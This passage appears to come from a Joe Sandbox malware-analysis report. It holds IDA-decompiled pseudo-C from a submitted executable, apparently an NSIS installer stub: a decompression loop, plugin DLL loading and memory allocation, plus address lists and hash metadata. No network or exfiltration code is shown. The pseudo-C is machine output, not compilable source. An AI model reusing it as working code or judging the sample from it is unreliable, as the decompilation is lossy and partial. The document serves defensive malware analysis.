												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406c5f
0x00406c5f
0x00406c63
0x00406c8c
0x00406c96
0x00406c65
0x00406c6e
0x00406c7b
0x00406c7e
0x00406fc2
0x00406fc2
0x00406fc5
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00407013
0x00407017
0x004071c6
0x004071dc
0x004071e4
0x004071eb
0x004071ed
0x004071f4
0x004071f8
0x004071f8
0x00407023
0x0040702a
0x00407032
0x00407035
0x00407038
0x00407038
0x0040703e
0x0040703e
0x004067da
0x004067da
0x004067da
0x004067e3
0x00000000
0x00000000
0x004067e9
0x00000000
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406853
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00406fc2
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695b
0x004069cc
0x004069cf
0x004069d2
0x004069d9
0x004069e3
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x0040695d
0x00406961
0x00406964
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x0040697e
0x00406982
0x00406989
0x0040698c
0x00406993
0x00406997
0x0040699f
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a3
0x004069a6
0x004069c4
0x004069c6
0x00000000
0x004069a8
0x004069a8
0x004069ab
0x004069ae
0x004069b1
0x004069b3
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00000000
0x004069bf
0x00000000
0x00406bf5
0x00406bf9
0x00406c17
0x00406c1a
0x00406c21
0x00406c24
0x00406c27
0x00406c2a
0x00406c2d
0x00406c30
0x00406c32
0x00406c39
0x00406c3a
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c45
0x00406c4a
0x00000000
0x00406c4a
0x00406bfb
0x00406bfe
0x00406c01
0x00406c0b
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00000000
0x00000000
0x00000000
0x00406ca2
0x00406ca6
0x00000000
0x00000000
0x00406cac
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb8
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc3
0x00000000
0x00000000
0x00406d13
0x00406d17
0x00406d1e
0x00406d21
0x00406d24
0x00406d2e
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x00406d19
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d57
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d60
0x00406d67
0x00406d6c
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00407160
0x00000000
0x00407160
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a17
0x00406a1a
0x00000000
0x00000000
0x00406a20
0x00406a26
0x00000000
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a57
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a93
0x00406a9a
0x00406a9d
0x00000000
0x00406aa3
0x00000000
0x00406aa3
0x00000000
0x00406aa8
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406acd
0x00406acd
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af0
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1b
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2c
0x00000000
0x00406b2c
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b31
0x00000000
0x00000000
0x00406b6c
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8b
0x00406b8e
0x00406b91
0x00406b91
0x00406b97
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00406b38
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406bdf
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406be4
0x00406beb
0x00406bee
0x00000000
0x00406bf0
0x00000000
0x00406bf0
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00406c4d
0x00406c4d
0x00406c50
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00000000
0x00406f8c
0x00406f90
0x00406fb2
0x00406fb5
0x00406fbf
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406fc2
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9c
0x00406f9f
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00407080
0x00407080
0x00000000
0x00407080
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00406fa3
0x00406fa3
0x00406fa6
0x00000000
0x00000000
0x0040713a
0x0040713d
0x0040703e
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00407087
0x00407087
0x0040708a
0x00407091
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x004070be
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x0040703e
0x0040703e
0x00000000
0x00407044
0x0040703e
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x00407114
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00000000
0x00000000
0x00406cc6
0x00406cc6
0x00406cca
0x00407190
0x00000000
0x00407190
0x00406cd0
0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406f85
0x004071ba
0x00000000
0x00000000
0x004067e9
0x004071f1
0x004071f1
0x00000000
0x004071f1
0x0040703e
0x00406fc5
0x00406fc2

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2d8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406695( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052B0(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004038FA( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040202c
0x0040202c
0x00402031
0x00402038
0x004020f7
0x00402245
0x00402245
0x00402abf
0x00402ac2
0x00402ace
0x00402ace
0x00402047
0x00402051
0x00402054
0x00402064
0x00402068
0x00402070
0x00402073
0x004020f0
0x00000000
0x004020f0
0x00402075
0x00402080
0x00402084
0x004020c4
0x00402086
0x00402089
0x0040208c
0x004020b8
0x0040208e
0x00402091
0x0040209a
0x0040209c
0x0040209c
0x0040209a
0x0040208c
0x004020cc
0x004020e5
0x004020e5
0x00000000
0x004020cc
0x00402057
0x0040205f
0x00402062
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057

Part of subcall function 004052B0: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
Part of subcall function 004052B0: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,00403233), ref: 0040530B
Part of subcall function 004052B0: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll), ref: 0040531D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
Opcode Fuzzy Hash: e3961a0bc32dc20507236d74e46fa7042790e53cd6742115274889cdc0d07f9d
Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cdac; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040626E(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cdac; // 0x0
						 *_t34 = _t12;
						 *0x40cdac = _t34;
					} else {
						if(_t30 == __ebx) {
